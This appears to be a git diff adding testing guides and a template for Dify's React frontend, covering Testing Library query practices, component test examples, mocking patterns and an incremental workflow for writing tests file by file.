// Log testing playground URL
screen.logTestingPlaygroundURL()
// Pretty print DOM
import { prettyDOM } from '@testing-library/react'
console.log(prettyDOM(screen.getByRole('dialog')))
// Check available roles
import { getRoles } from '@testing-library/react'
console.log(getRoles(container))
```
## Common Mistakes to Avoid
### ❌ Don't Use Implementation Details
```typescript
// Bad - testing implementation
expect(component.state.isOpen).toBe(true)
expect(wrapper.find('.internal-class').length).toBe(1)
// Good - testing behavior
expect(screen.getByRole('dialog')).toBeInTheDocument()
```
### ❌ Don't Forget Cleanup
```typescript
// Bad - may leak state between tests
it('test 1', () => {
render(<Component />)
})
// Good - cleanup is automatic with RTL, but reset mocks
beforeEach(() => {
jest.clearAllMocks()
})
```
### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions)
```typescript
// ❌ Bad - hardcoded strings are brittle
expect(screen.getByText('Submit Form')).toBeInTheDocument()
expect(screen.getByText('Loading...')).toBeInTheDocument()
// ✅ Good - role-based queries (most semantic)
expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument()
expect(screen.getByRole('status')).toBeInTheDocument()
// ✅ Good - pattern matching (flexible)
expect(screen.getByText(/submit/i)).toBeInTheDocument()
expect(screen.getByText(/loading/i)).toBeInTheDocument()
// ✅ Good - test behavior, not exact UI text
expect(screen.getByRole('button')).toBeDisabled()
expect(screen.getByRole('alert')).toBeInTheDocument()
```
**Why prefer black-box assertions?**
- Text content may change (i18n, copy updates)
- Role-based queries test accessibility
- Pattern matching is resilient to minor changes
- Tests focus on behavior, not implementation details
### ❌ Don't Assert on Absence Without Query
```typescript
// Bad - throws if not found
expect(screen.getByText('Error')).not.toBeInTheDocument() // Error!
// Good - use queryBy for absence assertions
expect(screen.queryByText('Error')).not.toBeInTheDocument()
```


@ -0,0 +1,523 @@
# Domain-Specific Component Testing
This guide covers testing patterns for Dify's domain-specific components.
## Workflow Components (`workflow/`)
Workflow components handle node configuration, data flow, and graph operations.
### Key Test Areas
1. **Node Configuration**
1. **Data Validation**
1. **Variable Passing**
1. **Edge Connections**
1. **Error Handling**
### Example: Node Configuration Panel
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import NodeConfigPanel from './node-config-panel'
import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow'
// Mock workflow context
jest.mock('@/app/components/workflow/hooks', () => ({
useWorkflowStore: () => mockWorkflowStore,
useNodesInteractions: () => mockNodesInteractions,
}))
let mockWorkflowStore = {
nodes: [],
edges: [],
updateNode: jest.fn(),
}
let mockNodesInteractions = {
handleNodeSelect: jest.fn(),
handleNodeDelete: jest.fn(),
}
describe('NodeConfigPanel', () => {
beforeEach(() => {
jest.clearAllMocks()
mockWorkflowStore = {
nodes: [],
edges: [],
updateNode: jest.fn(),
}
})
describe('Node Configuration', () => {
it('should render node type selector', () => {
const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
expect(screen.getByLabelText(/model/i)).toBeInTheDocument()
})
it('should update node config on change', async () => {
const user = userEvent.setup()
const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4')
expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith(
node.id,
expect.objectContaining({ model: 'gpt-4' })
)
})
})
describe('Data Validation', () => {
it('should show error for invalid input', async () => {
const user = userEvent.setup()
const node = createMockNode({ type: 'code' })
render(<NodeConfigPanel node={node} />)
// Enter invalid code
const codeInput = screen.getByLabelText(/code/i)
await user.clear(codeInput)
await user.type(codeInput, 'invalid syntax {{{')
await waitFor(() => {
expect(screen.getByText(/syntax error/i)).toBeInTheDocument()
})
})
it('should validate required fields', async () => {
const node = createMockNode({ type: 'http', data: { url: '' } })
render(<NodeConfigPanel node={node} />)
fireEvent.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(screen.getByText(/url is required/i)).toBeInTheDocument()
})
})
})
describe('Variable Passing', () => {
it('should display available variables from upstream nodes', () => {
const upstreamNode = createMockNode({
id: 'node-1',
type: 'start',
data: { outputs: [{ name: 'user_input', type: 'string' }] },
})
const currentNode = createMockNode({
id: 'node-2',
type: 'llm',
})
mockWorkflowStore.nodes = [upstreamNode, currentNode]
mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }]
render(<NodeConfigPanel node={currentNode} />)
// Variable selector should show upstream variables
fireEvent.click(screen.getByRole('button', { name: /add variable/i }))
expect(screen.getByText('user_input')).toBeInTheDocument()
})
it('should insert variable into prompt template', async () => {
const user = userEvent.setup()
const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
// Click variable button
await user.click(screen.getByRole('button', { name: /insert variable/i }))
await user.click(screen.getByText('user_input'))
const promptInput = screen.getByLabelText(/prompt/i)
expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}'))
})
})
})
```
## Dataset Components (`dataset/`)
Dataset components handle file uploads, data display, and search/filter operations.
### Key Test Areas
1. **File Upload**
1. **File Type Validation**
1. **Pagination**
1. **Search & Filtering**
1. **Data Format Handling**
### Example: Document Uploader
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import DocumentUploader from './document-uploader'
jest.mock('@/service/datasets', () => ({
uploadDocument: jest.fn(),
parseDocument: jest.fn(),
}))
import * as datasetService from '@/service/datasets'
const mockedService = datasetService as jest.Mocked<typeof datasetService>
describe('DocumentUploader', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('File Upload', () => {
it('should accept valid file types', async () => {
const user = userEvent.setup()
const onUpload = jest.fn()
mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' })
render(<DocumentUploader onUpload={onUpload} />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
const input = screen.getByLabelText(/upload/i)
await user.upload(input, file)
await waitFor(() => {
expect(mockedService.uploadDocument).toHaveBeenCalledWith(
expect.any(FormData)
)
})
})
it('should reject invalid file types', async () => {
const user = userEvent.setup()
render(<DocumentUploader />)
const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' })
const input = screen.getByLabelText(/upload/i)
await user.upload(input, file)
expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument()
expect(mockedService.uploadDocument).not.toHaveBeenCalled()
})
it('should show upload progress', async () => {
const user = userEvent.setup()
// Mock upload with progress
mockedService.uploadDocument.mockImplementation(() => {
return new Promise((resolve) => {
setTimeout(() => resolve({ id: 'doc-1' }), 100)
})
})
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
expect(screen.getByRole('progressbar')).toBeInTheDocument()
await waitFor(() => {
expect(screen.queryByRole('progressbar')).not.toBeInTheDocument()
})
})
})
describe('Error Handling', () => {
it('should handle upload failure', async () => {
const user = userEvent.setup()
mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed'))
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
await waitFor(() => {
expect(screen.getByText(/upload failed/i)).toBeInTheDocument()
})
})
it('should allow retry after failure', async () => {
const user = userEvent.setup()
mockedService.uploadDocument
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce({ id: 'doc-1' })
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
await waitFor(() => {
expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument()
})
await user.click(screen.getByRole('button', { name: /retry/i }))
await waitFor(() => {
expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument()
})
})
})
})
```
### Example: Document List with Pagination
```typescript
describe('DocumentList', () => {
describe('Pagination', () => {
it('should load first page on mount', async () => {
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '1', name: 'Doc 1' }],
total: 50,
page: 1,
pageSize: 10,
})
render(<DocumentList datasetId="ds-1" />)
await waitFor(() => {
expect(screen.getByText('Doc 1')).toBeInTheDocument()
})
expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 })
})
it('should navigate to next page', async () => {
const user = userEvent.setup()
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '1', name: 'Doc 1' }],
total: 50,
page: 1,
pageSize: 10,
})
render(<DocumentList datasetId="ds-1" />)
await waitFor(() => {
expect(screen.getByText('Doc 1')).toBeInTheDocument()
})
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '11', name: 'Doc 11' }],
total: 50,
page: 2,
pageSize: 10,
})
await user.click(screen.getByRole('button', { name: /next/i }))
await waitFor(() => {
expect(screen.getByText('Doc 11')).toBeInTheDocument()
})
})
})
describe('Search & Filtering', () => {
it('should filter by search query', async () => {
jest.useFakeTimers()
// Let userEvent advance fake timers; otherwise typing with a delay would hang
const user = userEvent.setup({ advanceTimers: jest.advanceTimersByTime })
render(<DocumentList datasetId="ds-1" />)
await user.type(screen.getByPlaceholderText(/search/i), 'test query')
// Debounce
jest.advanceTimersByTime(300)
await waitFor(() => {
expect(mockedService.getDocuments).toHaveBeenCalledWith(
'ds-1',
expect.objectContaining({ search: 'test query' })
)
})
jest.useRealTimers()
})
})
})
```
## Configuration Components (`app/configuration/`, `config/`)
Configuration components handle forms, validation, and data persistence.
### Key Test Areas
1. **Form Validation**
1. **Save/Reset**
1. **Required vs Optional Fields**
1. **Configuration Persistence**
1. **Error Feedback**
### Example: App Configuration Form
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import AppConfigForm from './app-config-form'
jest.mock('@/service/apps', () => ({
updateAppConfig: jest.fn(),
getAppConfig: jest.fn(),
}))
import * as appService from '@/service/apps'
const mockedService = appService as jest.Mocked<typeof appService>
describe('AppConfigForm', () => {
const defaultConfig = {
name: 'My App',
description: '',
icon: 'default',
openingStatement: '',
}
beforeEach(() => {
jest.clearAllMocks()
mockedService.getAppConfig.mockResolvedValue(defaultConfig)
})
describe('Form Validation', () => {
it('should require app name', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Clear name field
await user.clear(screen.getByLabelText(/name/i))
await user.click(screen.getByRole('button', { name: /save/i }))
expect(screen.getByText(/name is required/i)).toBeInTheDocument()
expect(mockedService.updateAppConfig).not.toHaveBeenCalled()
})
it('should validate name length', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toBeInTheDocument()
})
// Enter very long name
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101))
expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument()
})
it('should allow empty optional fields', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockResolvedValue({ success: true })
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Leave description empty (optional)
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(mockedService.updateAppConfig).toHaveBeenCalled()
})
})
})
describe('Save/Reset Functionality', () => {
it('should save configuration', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockResolvedValue({ success: true })
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'Updated App')
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(mockedService.updateAppConfig).toHaveBeenCalledWith(
'app-1',
expect.objectContaining({ name: 'Updated App' })
)
})
// The success message appears asynchronously, so use findBy* instead of getBy*
expect(await screen.findByText(/saved successfully/i)).toBeInTheDocument()
})
it('should reset to default values', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Make changes
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'Changed Name')
// Reset
await user.click(screen.getByRole('button', { name: /reset/i }))
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
it('should show unsaved changes warning', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Make changes
await user.type(screen.getByLabelText(/name/i), ' Updated')
expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument()
})
})
describe('Error Handling', () => {
it('should show error on save failure', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockRejectedValue(new Error('Server error'))
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(screen.getByText(/failed to save/i)).toBeInTheDocument()
})
})
})
})
```


@ -0,0 +1,353 @@
# Mocking Guide for Dify Frontend Tests
## ⚠️ Important: What NOT to Mock
### DO NOT Mock Base Components
**Never mock components from `@/app/components/base/`** such as:
- `Loading`, `Spinner`
- `Button`, `Input`, `Select`
- `Tooltip`, `Modal`, `Dropdown`
- `Icon`, `Badge`, `Tag`
**Why?**
- Base components will have their own dedicated tests
- Mocking them creates false positives (tests pass but real integration fails)
- Using real components tests actual integration behavior
```typescript
// ❌ WRONG: Don't mock base components
jest.mock('@/app/components/base/loading', () => () => <div>Loading</div>)
jest.mock('@/app/components/base/button', () => ({ children }: any) => <button>{children}</button>)
// ✅ CORRECT: Import and use real base components
import Loading from '@/app/components/base/loading'
import Button from '@/app/components/base/button'
// They will render normally in tests
```
### What TO Mock
Only mock these categories:
1. **API services** (`@/service/*`) - Network calls
1. **Complex context providers** - When setup is too difficult
1. **Third-party libraries with side effects** - `next/navigation`, external SDKs
1. **i18n** - Always mock to return keys
## Mock Placement
| Location | Purpose |
|----------|---------|
| `web/__mocks__/` | Reusable mocks shared across multiple test files |
| Test file | Test-specific mocks, inline with `jest.mock()` |
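A shared mock is typically consumed like this (sketch; the factory name comes from the provider-context mock referenced later in this guide, but exact exports may differ):

```typescript
import type { ReactElement } from 'react'
import { render } from '@testing-library/react'
import { ProviderContext } from '@/context/provider-context'
// Shared factory lives in web/__mocks__/ and is reused across spec files
import { createMockProviderContextValue } from '@/__mocks__/provider-context'

// Test-specific mock stays inline in the spec file itself
jest.mock('@/service/api')

const renderWithProvider = (ui: ReactElement) =>
  render(
    <ProviderContext.Provider value={createMockProviderContextValue()}>
      {ui}
    </ProviderContext.Provider>,
  )
```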
## Essential Mocks
### 1. i18n (Always Required)
```typescript
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
```
### 2. Next.js Router
```typescript
const mockPush = jest.fn()
const mockReplace = jest.fn()
jest.mock('next/navigation', () => ({
useRouter: () => ({
push: mockPush,
replace: mockReplace,
back: jest.fn(),
prefetch: jest.fn(),
}),
usePathname: () => '/current-path',
useSearchParams: () => new URLSearchParams('?key=value'),
}))
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
})
it('should navigate on click', () => {
render(<Component />)
fireEvent.click(screen.getByRole('button'))
expect(mockPush).toHaveBeenCalledWith('/expected-path')
})
})
```
### 3. Portal Components (with Shared State)
```typescript
// ⚠️ Important: Use shared state for components that depend on each other
let mockPortalOpenState = false
jest.mock('@/app/components/base/portal-to-follow-elem', () => ({
PortalToFollowElem: ({ children, open, ...props }: any) => {
mockPortalOpenState = open || false // Update shared state
return <div data-testid="portal" data-open={open}>{children}</div>
},
PortalToFollowElemContent: ({ children }: any) => {
// ✅ Matches actual: returns null when portal is closed
if (!mockPortalOpenState) return null
return <div data-testid="portal-content">{children}</div>
},
PortalToFollowElemTrigger: ({ children }: any) => (
<div data-testid="portal-trigger">{children}</div>
),
}))
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
mockPortalOpenState = false // ✅ Reset shared state
})
})
```
### 4. API Service Mocks
```typescript
import * as api from '@/service/api'
jest.mock('@/service/api')
const mockedApi = api as jest.Mocked<typeof api>
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
// Setup default mock implementation
mockedApi.fetchData.mockResolvedValue({ data: [] })
})
it('should show data on success', async () => {
mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] })
render(<Component />)
await waitFor(() => {
expect(screen.getByText('1')).toBeInTheDocument()
})
})
it('should show error on failure', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
render(<Component />)
await waitFor(() => {
expect(screen.getByText(/error/i)).toBeInTheDocument()
})
})
})
```
### 5. HTTP Mocking with Nock
```typescript
import nock from 'nock'
const GITHUB_HOST = 'https://api.github.com'
const GITHUB_PATH = '/repos/owner/repo'
const mockGithubApi = (status: number, body: Record<string, unknown>, delayMs = 0) => {
return nock(GITHUB_HOST)
.get(GITHUB_PATH)
.delay(delayMs)
.reply(status, body)
}
describe('GithubComponent', () => {
afterEach(() => {
nock.cleanAll()
})
it('should display repo info', async () => {
mockGithubApi(200, { name: 'dify', stars: 1000 })
render(<GithubComponent />)
await waitFor(() => {
expect(screen.getByText('dify')).toBeInTheDocument()
})
})
it('should handle API error', async () => {
mockGithubApi(500, { message: 'Server error' })
render(<GithubComponent />)
await waitFor(() => {
expect(screen.getByText(/error/i)).toBeInTheDocument()
})
})
})
```
### 6. Context Providers
```typescript
import { ProviderContext } from '@/context/provider-context'
import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context'
describe('Component with Context', () => {
it('should render for free plan', () => {
const mockContext = createMockPlan('sandbox')
render(
<ProviderContext.Provider value={mockContext}>
<Component />
</ProviderContext.Provider>
)
expect(screen.getByText('Upgrade')).toBeInTheDocument()
})
it('should render for pro plan', () => {
const mockContext = createMockPlan('professional')
render(
<ProviderContext.Provider value={mockContext}>
<Component />
</ProviderContext.Provider>
)
expect(screen.queryByText('Upgrade')).not.toBeInTheDocument()
})
})
```
### 7. SWR / React Query
```typescript
// SWR
jest.mock('swr', () => ({
__esModule: true,
default: jest.fn(),
}))
import useSWR from 'swr'
const mockedUseSWR = useSWR as jest.Mock
describe('Component with SWR', () => {
it('should show loading state', () => {
mockedUseSWR.mockReturnValue({
data: undefined,
error: undefined,
isLoading: true,
})
render(<Component />)
expect(screen.getByText(/loading/i)).toBeInTheDocument()
})
})
// React Query
import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
const createTestQueryClient = () => new QueryClient({
defaultOptions: {
queries: { retry: false },
mutations: { retry: false },
},
})
const renderWithQueryClient = (ui: React.ReactElement) => {
const queryClient = createTestQueryClient()
return render(
<QueryClientProvider client={queryClient}>
{ui}
</QueryClientProvider>
)
}
```
## Mock Best Practices
### ✅ DO
1. **Use real base components** - Import from `@/app/components/base/` directly
1. **Use real project components** - Prefer importing over mocking
1. **Reset mocks in `beforeEach`**, not `afterEach`
1. **Match actual component behavior** in mocks (when mocking is necessary)
1. **Use factory functions** for complex mock data
1. **Import actual types** for type safety
1. **Reset shared mock state** in `beforeEach`
### ❌ DON'T
1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.)
1. Don't mock components you can import directly
1. Don't create overly simplified mocks that miss conditional logic
1. Don't forget to clean up nock after each test
1. Don't use `any` types in mocks without necessity
### Mock Decision Tree
```
Need to use a component in test?
├─ Is it from @/app/components/base/*?
│ └─ YES → Import real component, DO NOT mock
├─ Is it a project component?
│ └─ YES → Prefer importing real component
│ Only mock if setup is extremely complex
├─ Is it an API service (@/service/*)?
│ └─ YES → Mock it
├─ Is it a third-party lib with side effects?
│ └─ YES → Mock it (next/navigation, external SDKs)
└─ Is it i18n?
└─ YES → Mock to return keys
```
## Factory Function Pattern
```typescript
// __mocks__/data-factories.ts
import type { User, Project } from '@/types'
export const createMockUser = (overrides: Partial<User> = {}): User => ({
id: 'user-1',
name: 'Test User',
email: 'test@example.com',
role: 'member',
createdAt: new Date().toISOString(),
...overrides,
})
export const createMockProject = (overrides: Partial<Project> = {}): Project => ({
id: 'project-1',
name: 'Test Project',
description: 'A test project',
owner: createMockUser(),
members: [],
createdAt: new Date().toISOString(),
...overrides,
})
// Usage in tests
it('should display project owner', () => {
const project = createMockProject({
owner: createMockUser({ name: 'John Doe' }),
})
render(<ProjectCard project={project} />)
expect(screen.getByText('John Doe')).toBeInTheDocument()
})
```


@ -0,0 +1,269 @@
# Testing Workflow Guide
This guide defines the workflow for generating tests, especially for complex components or directories with multiple files.
## Scope Clarification
This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals.
| Scope | Rule |
|-------|------|
| **Single file** | Complete coverage in one generation (100% function, >95% branch) |
| **Multi-file directory** | Process one file at a time, verify each before proceeding |
## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing
When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach.
### Why Incremental?
| Batch Approach (❌) | Incremental Approach (✅) |
|---------------------|---------------------------|
| Generate 5+ tests at once | Generate 1 test at a time |
| Run tests only at the end | Run test immediately after each file |
| Multiple failures compound | Single point of failure, easy to debug |
| Hard to identify root cause | Clear cause-effect relationship |
| Mock issues affect many files | Mock issues caught early |
| Messy git history | Clean, atomic commits possible |
## Single File Workflow
When testing a **single component, hook, or utility**:
```
1. Read source code completely
2. Run `pnpm analyze-component <path>` (if available)
3. Check complexity score and features detected
4. Write the test file
5. Run test: `pnpm test -- <file>.spec.tsx`
6. Fix any failures
7. Verify coverage meets goals (100% function, >95% branch)
```
## Directory/Multi-File Workflow (MUST FOLLOW)
When testing a **directory or multiple files**, follow this strict workflow:
### Step 1: Analyze and Plan
1. **List all files** that need tests in the directory
1. **Categorize by complexity**:
- 🟢 **Simple**: Utility functions, simple hooks, presentational components
- 🟡 **Medium**: Components with state, effects, or event handlers
- 🔴 **Complex**: Components with API calls, routing, or many dependencies
1. **Order by dependency**: Test dependencies before dependents
1. **Create a todo list** to track progress
### Step 2: Determine Processing Order
Process files in this recommended order:
```
1. Utility functions (simplest, no React)
2. Custom hooks (isolated logic)
3. Simple presentational components (few/no props)
4. Medium complexity components (state, effects)
5. Complex components (API, routing, many deps)
6. Container/index components (integration tests - last)
```
**Rationale**:
- Simpler files help establish mock patterns
- Hooks used by components should be tested first
- Integration tests (index files) depend on child components working
### Step 3: Process Each File Incrementally
**For EACH file in the ordered list:**
```
┌─────────────────────────────────────────────┐
│ 1. Write test file │
│ 2. Run: pnpm test -- <file>.spec.tsx │
│ 3. If FAIL → Fix immediately, re-run │
│ 4. If PASS → Mark complete in todo list │
│ 5. ONLY THEN proceed to next file │
└─────────────────────────────────────────────┘
```
**DO NOT proceed to the next file until the current one passes.**
### Step 4: Final Verification
After all individual tests pass:
```bash
# Run all tests in the directory together
pnpm test -- path/to/directory/
# Check coverage
pnpm test -- --coverage path/to/directory/
```
## Component Complexity Guidelines
Use `pnpm analyze-component <path>` to assess complexity before testing.
### 🔴 Very Complex Components (Complexity > 50)
**Consider refactoring BEFORE testing:**
- Break component into smaller, testable pieces
- Extract complex logic into custom hooks
- Separate container and presentational layers
**If testing as-is:**
- Use integration tests for complex workflows
- Use `test.each()` for data-driven testing (see the sketch below)
- Multiple `describe` blocks for organization
- Consider testing major sections separately
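For example, a hedged sketch of the data-driven approach — `StatusBadge` and its label keys are stand-ins, not real Dify components:

```typescript
import { render, screen } from '@testing-library/react'

// Stand-in component so the sketch is self-contained; swap in the real component.
const StatusBadge = ({ status }: { status: string }) => <span>{`app.status.${status}`}</span>

describe('StatusBadge', () => {
  // One table drives many branches instead of one near-identical test per branch.
  test.each([
    // [status, expectedLabel]
    ['running', 'app.status.running'],
    ['succeeded', 'app.status.succeeded'],
    ['failed', 'app.status.failed'],
  ])('should render the correct label when status is %s', (status, expectedLabel) => {
    render(<StatusBadge status={status} />)
    expect(screen.getByText(expectedLabel)).toBeInTheDocument()
  })
})
```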
### 🟡 Medium Complexity (Complexity 30-50)
- Group related tests in `describe` blocks
- Test integration scenarios between internal parts
- Focus on state transitions and side effects
- Use helper functions to reduce test complexity (see the sketch below)
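A shared `setup` helper is one way to keep individual tests short; this sketch uses a stand-in `SettingsPanel` purely for illustration:

```typescript
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'

// Stand-in component so the sketch is self-contained; replace with the real one.
type PanelProps = { title: string; onSave: () => void }
const SettingsPanel = ({ title, onSave }: PanelProps) => (
  <div>
    <h2>{title}</h2>
    <button onClick={onSave}>Save</button>
  </div>
)

// Merge default props, return the user-event instance alongside the render result
const setup = (props: Partial<PanelProps> = {}) => {
  const user = userEvent.setup()
  const defaultProps: PanelProps = { title: 'Settings', onSave: jest.fn() }
  const utils = render(<SettingsPanel {...defaultProps} {...props} />)
  return { user, props: { ...defaultProps, ...props }, ...utils }
}

it('should call onSave when the save button is clicked', async () => {
  const { user, props } = setup()
  await user.click(screen.getByRole('button', { name: /save/i }))
  expect(props.onSave).toHaveBeenCalledTimes(1)
})
```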
### 🟢 Simple Components (Complexity < 30)
- Standard test structure
- Focus on props, rendering, and edge cases
- Usually straightforward to test
### 📏 Large Files (500+ lines)
Regardless of complexity score:
- **Strongly consider refactoring** before testing
- If testing as-is, test major sections separately
- Create helper functions for test setup
- May need multiple test files
## Todo List Format
When testing multiple files, use a todo list like this:
```
Testing: path/to/directory/
Ordered by complexity (simple → complex):
☐ utils/helper.ts [utility, simple]
☐ hooks/use-custom-hook.ts [hook, simple]
☐ empty-state.tsx [component, simple]
☐ item-card.tsx [component, medium]
☐ list.tsx [component, complex]
☐ index.tsx [integration]
Progress: 0/6 complete
```
Update status as you complete each:
- ☐ → ⏳ (in progress)
- ⏳ → ✅ (complete and verified)
- ⏳ → ❌ (blocked, needs attention)
## When to Stop and Verify
**Always run tests after:**
- Completing a test file
- Making changes to fix a failure
- Modifying shared mocks
- Updating test utilities or helpers
**Signs you should pause:**
- More than 2 consecutive test failures
- Mock-related errors appearing
- Unclear why a test is failing
- Test passing but coverage unexpectedly low
## Common Pitfalls to Avoid
### ❌ Don't: Generate Everything First
```
# BAD: Writing all files then testing
Write component-a.spec.tsx
Write component-b.spec.tsx
Write component-c.spec.tsx
Write component-d.spec.tsx
Run pnpm test ← Multiple failures, hard to debug
```
### ✅ Do: Verify Each Step
```
# GOOD: Incremental with verification
Write component-a.spec.tsx
Run pnpm test -- component-a.spec.tsx ✅
Write component-b.spec.tsx
Run pnpm test -- component-b.spec.tsx ✅
...continue...
```
### ❌ Don't: Skip Verification for "Simple" Components
Even simple components can have:
- Import errors
- Missing mock setup
- Incorrect assumptions about props
**Always verify, regardless of perceived simplicity.**
### ❌ Don't: Continue When Tests Fail
Failing tests compound:
- A mock issue in file A affects files B, C, D
- Fixing A later requires revisiting all dependent tests
- Time wasted on debugging cascading failures
**Fix failures immediately before proceeding.**
## Integration with Claude's Todo Feature
When using Claude for multi-file testing:
1. **Ask Claude to create a todo list** before starting
1. **Request one file at a time** or ensure Claude processes incrementally
1. **Verify each test passes** before asking for the next
1. **Mark todos complete** as you progress
Example prompt:
```
Test all components in `path/to/directory/`.
First, analyze the directory and create a todo list ordered by complexity.
Then, process ONE file at a time, waiting for my confirmation that tests pass
before proceeding to the next.
```
## Summary Checklist
Before starting multi-file testing:
- [ ] Listed all files needing tests
- [ ] Ordered by complexity (simple → complex)
- [ ] Created todo list for tracking
- [ ] Understand dependencies between files
During testing:
- [ ] Processing ONE file at a time
- [ ] Running tests after EACH file
- [ ] Fixing failures BEFORE proceeding
- [ ] Updating todo list progress
After completion:
- [ ] All individual tests pass
- [ ] Full directory test run passes
- [ ] Coverage goals met
- [ ] Todo list shows all complete

View File

@ -0,0 +1,289 @@
/**
* Test Template for React Components
*
* WHY THIS STRUCTURE?
* - Organized sections make tests easy to navigate and maintain
* - Mocks at top ensure consistent test isolation
* - Factory functions reduce duplication and improve readability
* - describe blocks group related scenarios for better debugging
*
* INSTRUCTIONS:
* 1. Replace `ComponentName` with your component name
* 2. Update import path
* 3. Add/remove test sections based on component features (use analyze-component)
 * 4. Follow AAA pattern: Arrange → Act → Assert
*
* RUN FIRST: pnpm analyze-component <path> to identify required test scenarios
*/
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
// import ComponentName from './index'
// ============================================================================
// Mocks
// ============================================================================
// WHY: Mocks must be hoisted to top of file (Jest requirement).
// They run BEFORE imports, so keep them before component imports.
// i18n (always required in Dify)
// WHY: Returns key instead of translation so tests don't depend on i18n files
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
// Router (if component uses useRouter, usePathname, useSearchParams)
// WHY: Isolates tests from Next.js routing, enables testing navigation behavior
// const mockPush = jest.fn()
// jest.mock('next/navigation', () => ({
// useRouter: () => ({ push: mockPush }),
// usePathname: () => '/test-path',
// }))
// API services (if component fetches data)
// WHY: Prevents real network calls, enables testing all states (loading/success/error)
// jest.mock('@/service/api')
// import * as api from '@/service/api'
// const mockedApi = api as jest.Mocked<typeof api>
// Shared mock state (for portal/dropdown components)
// WHY: Portal components like PortalToFollowElem need shared state between
// parent and child mocks to correctly simulate open/close behavior
// let mockOpenState = false
// ============================================================================
// Test Data Factories
// ============================================================================
// WHY FACTORIES?
// - Avoid hard-coded test data scattered across tests
// - Easy to create variations with overrides
// - Type-safe when using actual types from source
// - Single source of truth for default test values
// const createMockProps = (overrides = {}) => ({
// // Default props that make component render successfully
// ...overrides,
// })
// const createMockItem = (overrides = {}) => ({
// id: 'item-1',
// name: 'Test Item',
// ...overrides,
// })
// ============================================================================
